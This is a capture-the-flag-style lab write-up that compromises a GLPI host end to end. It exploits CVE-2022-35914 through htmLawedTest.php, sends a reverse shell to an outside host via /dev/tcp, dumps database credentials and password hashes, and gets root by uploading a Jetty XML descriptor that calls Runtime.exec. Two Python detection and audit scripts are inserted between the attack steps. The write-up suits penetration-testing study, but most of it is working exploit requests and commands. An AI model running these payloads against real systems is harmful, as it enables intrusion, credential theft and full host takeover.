OSCP Lab: GLPI


Key points (CVE-2022-35914 PHP execution-function bypass + SSH port forwarding + Jetty XML RCE)

1. nmap scan (SSH port forwarding)

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.194.242 -sV -sC --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-26 22:22 EDT
Nmap scan report for 192.168.194.242
Host is up (0.37s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Authentication - GLPI
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.45 seconds


2.user priv

## Directory scan:
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.194.242
[22:26:05] 200 -   40KB - /CHANGELOG.md   

## The directory scan found CHANGELOG; comparing it gave the version number. The public exploit for that version needs a password; weak and default password attempts failed:
## A Google search turned up an unauthenticated RCE:
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh
https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/

###
## exec produced no output; phpinfo shows the exec function is disabled:
┌──(root㉿kali)-[~/Desktop]
└─# curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://192.168.194.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

##
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1

sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd


##
## Reverse shell:
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1

sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=system&spec[0]=&spec[1]=bash -c 'bash -i >& /dev/tcp/192.168.45.171/80 0>&1'
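From the defender's side, the two requests above are easy to spot: any hit on the shipped htmLawedTest.php is abnormal, and the form fields carry PHP function names. The following detection helper is an added example, not from the write-up; it assumes a raw request as a WAF or full-packet capture would hand it over, and the sample request is constructed from the shape shown above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the request shape used against htmLawedTest.php above.
SAMPLE_REQUEST = (
    "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\n"
    "Host: 192.168.178.242\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "sid=foo&text=call_user_func&hhook=array_map&hexec=passthru"
    "&spec[0]=&spec[1]=cat+/etc/passwd"
)
BENIGN_REQUEST = "GET /index.php HTTP/1.1\nHost: 192.168.178.242\n\n"

TEST_SCRIPT = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
# PHP functions that run OS commands, and callbacks that reach them indirectly
# (the route used above once exec() itself sits in disable_functions).
EXEC_FUNCS = {"exec", "system", "passthru", "shell_exec", "popen", "proc_open"}
CALLBACK_FUNCS = {"call_user_func", "call_user_func_array", "array_map", "array_filter"}
SHELLY = re.compile(r"/dev/tcp|/etc/passwd|bash -i|\bnc\b")

def inspect_request(raw: str) -> list[str]:
    """Return findings for one raw HTTP request (empty list if nothing suspicious)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target = head.splitlines()[0].split()[:2]
    path, _, query = target.partition("?")
    findings = []
    if path.endswith(TEST_SCRIPT):
        findings.append(f"{method} to shipped test script {TEST_SCRIPT}")
    params = parse_qs("&".join(p for p in (query, body) if p), keep_blank_values=True)
    # text/hhook/hexec are treated as function names by the test page.
    for key in ("text", "hhook", "hexec"):
        for val in params.get(key, []):
            if val in EXEC_FUNCS:
                findings.append(f"{key}={val}: command-execution function")
            elif val in CALLBACK_FUNCS:
                findings.append(f"{key}={val}: callback that can reach a disabled function")
    # spec[N] carries the arguments handed to that callback.
    for key, vals in params.items():
        if key.startswith("spec"):
            findings += [f"{key}: shell-style argument {v!r}" for v in vals if SHELLY.search(v)]
    return findings

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_REQUEST):
        print("ALERT:", finding)
```

The fix on the server side is simpler than any detection: delete the vendor test file (or upgrade GLPI past the affected release), since the page has no production purpose.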


####################
## Found database credentials:
www-data@glpi:/var/www/glpi/config$ cat config_db.php
cat config_db.php
<?php
class DB extends DBmysql {
   public $dbhost = 'localhost';
   public $dbuser = 'glpi';
   public $dbpassword = 'glpi_db_password';
   public $dbdefault = 'glpi';
   public $use_utf8mb4 = true;
   public $allow_myisam = false;
   public $allow_datetime = false;
   public $allow_signed_keys = false;
}


####################
## Upgrade the shell and connect to MySQL:
┌──(root㉿kali)-[~/Desktop]
└─# sudo rlwrap -cAr nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.178.242] 40028
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ python3 -c 'import pty;pty.spawn("bash")'
<htmlawed$ python3 -c 'import pty;pty.spawn("bash")'  
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ 
zsh: suspended  sudo rlwrap -cAr nc -lvnp 80
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo; fg          
[1]  + continued  sudo rlwrap -cAr nc -lvnp 80
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ mysql -u glpi -p
mysql -u glpi -p
Enter password: glpi_db_password

Welcome to the MySQL monitor.  Commands end with ; or \g.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
mysql> select id,name,password from glpi_users;
select id,name,password from glpi_users;
+----+-------------+--------------------------------------------------------------+
| id | name        | password                                                     |
+----+-------------+--------------------------------------------------------------+
|  2 | glpi        | $2y$10$9DbdMovtCw0eI.FWm18SRu34ErQD6LUzA8AqGUqiEat0S/ahlyHFa |
|  3 | post-only   | $2y$10$dTMar1F3ef5X/H1IjX9gYOjQWBR1K4bERGf4/oTPxFtJE/c3vXILm |
|  4 | tech        | $2y$10$.xEgErizkp6Az0z.DHyoeOoenuh0RcsX4JapBk2JMD6VI17KtB1lO |
|  5 | normal      | $2y$10$Z6doq4zVHkSPZFbPeXTCluN1Q/r0ryZ3ZsSJncJqkN3.8cRiN0NV. |
|  6 | glpi-system |                                                              |
|  7 | betty       | $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa |
+----+-------------+--------------------------------------------------------------+
6 rows in set (0.00 sec)

## cat /etc/passwd | grep -v nologin reveals the user betty:
## Crack betty's hash: $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa

## Cracking failed:
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:57 0.33% (ETA: 2024-03-29 02:25) 0g/s 105.8p/s 105.8c/s 105.8C/s honda04..grethel

######################
## Query all MySQL tables that contain a given column:
SELECT TABLE_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'your_column_name' AND TABLE_SCHEMA = 'your_database_name';

## Query other tables; sensitive information found: betty:SnowboardSkateboardRoller234
mysql> select * from glpi_itilfollowups;
select * from glpi_itilfollowups;
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
| id | itemtype | items_id | date                | users_id | users_id_editor | content                                                                                                                                                                                                                                                 | is_private | requesttypes_id | date_mod            | date_creation       | timeline_position | sourceitems_id | sourceof_items_id |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
|  1 | Ticket   |        1 | 2022-10-08 20:57:14 |        2 |               0 | &#60;p&#62;Hello Betty,&#60;/p&#62;
&#60;p&#62;i changed your password to : SnowboardSkateboardRoller234&#60;/p&#62;
&#60;p&#62;Please change it again as soon as you can.&#60;/p&#62;
&#60;p&#62;regards.&#60;/p&#62;
&#60;p&#62;Lucas&#60;/p&#62; |          0 |               1 | 2022-10-08 20:57:14 | 2022-10-08 20:57:14 |                 4 |              0 |                 0 |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+


##
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ su betty
su betty
Password: SnowboardSkateboardRoller234

$ id
id
uid=1000(betty) gid=1000(betty) groups=1000(betty)
$ whoami
whoami
betty
$ cat /home/betty/local.txt
cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0
$ 


(screenshots omitted)

Notes: (screenshots omitted)

3. root priv

## linpeas enumeration:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                 
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                                                             
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -     

###########
## SSH local port forwarding:
ssh -L 1234:localhost:8080 betty@192.168.178.242 -N

##
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce

## Upload a malicious XML to get a reverse shell:
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------

##
<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
    <Call class="java.lang.Runtime" name="getRuntime">
        <Call name="exec">
            <Arg>
                <Array type="String">
                    <Item>/tmp/root.sh</Item>
                </Array>
            </Arg>
        </Call>
    </Call>
</Configure>

###
betty@glpi:/opt/jetty/jetty-base$ echo "chmod +s /bin/bash" > /tmp/root.sh
echo "chmod +s /bin/bash" > /tmp/root.sh
betty@glpi:/opt/jetty/jetty-base$ chmod +x /tmp/root.sh

## Write the XML into the Jetty webroot directory:
$ wget http://192.168.45.171/rooted.xml
--2024-03-27 11:02:54--  http://192.168.45.171/rooted.xml
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 464 [application/xml]
Saving to: ‘rooted.xml’

rooted.xml                         100%[=============================================================>]     464  --.-KB/s    in 0s      

2024-03-27 11:02:55 (27.4 MB/s) - ‘rooted.xml’ saved [464/464]

$ ls
rooted.xml  root.xml
$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
$ bash -p
bash-5.0# id
uid=1000(betty) gid=1000(betty) euid=0(root) egid=0(root) groups=0(root),1000(betty)
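The root path here depends on two things: a webapps/ directory writable by a low-privilege user, and Jetty's XML deployer evaluating <Call>/<New> elements reflectively. The audit script below is an added example, not part of the write-up; it parses Jetty descriptors and flags calls into java.lang.Runtime and similar classes, and the sample descriptor is constructed from the XML shown above.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample: the descriptor shape from the write-up above.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
    <Call class="java.lang.Runtime" name="getRuntime">
        <Call name="exec"><Arg><Array type="String"><Item>/tmp/root.sh</Item></Array></Arg></Call>
    </Call>
</Configure>"""

# Classes a context deployment descriptor has no legitimate reason to touch.
DANGEROUS_CLASSES = {"java.lang.Runtime", "java.lang.ProcessBuilder",
                     "java.lang.reflect.Method", "javax.script.ScriptEngineManager"}

def audit_jetty_xml(text: str) -> list[str]:
    """Return findings for one Jetty XML descriptor (empty list if clean)."""
    root = ET.fromstring(text)  # expat does not fetch the external DTD
    findings = []
    for elem in root.iter():
        cls = elem.get("class", "")
        # <Call>/<New>/<Get> with class= invoke static members reflectively.
        if elem.tag in ("Call", "New", "Get") and cls in DANGEROUS_CLASSES:
            findings.append(f'<{elem.tag} class="{cls}">')
        if elem.tag == "Call" and elem.get("name") == "exec":
            args = [item.text for item in elem.iter("Item")]
            findings.append(f'Call name="exec" args={args}')
    return findings

def audit_webapps(webapps: Path) -> dict[str, list[str]]:
    """Audit every *.xml in a Jetty webapps/ directory; map file name to findings."""
    report = {}
    for xml_file in sorted(webapps.glob("*.xml")):
        try:
            findings = audit_jetty_xml(xml_file.read_text())
        except ET.ParseError as exc:
            findings = [f"unparseable: {exc}"]
        if findings:
            report[xml_file.name] = findings
    return report

if __name__ == "__main__":
    for finding in audit_jetty_xml(SAMPLE_XML):
        print("ALERT:", finding)
```

Pair the audit with the permission check the write-up implies: webapps/ should be owned by root and not writable by the Jetty service account or any other user, since a writable deploy directory is root code execution when Jetty runs as root.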

######
##
bash-5.0# cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0

bash-5.0# cat /root/proof.txt
1063fa4253b657156458c71f4a7847b7


4. Summary:

## Writeups:
https://medium.com/@ardian.danny/oscp-practice-series-17-proving-grounds-glpi-555ce2d9234e
https://r4j3sh.medium.com/glpi-pg-practice-writeup-853aff88151f

##
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------
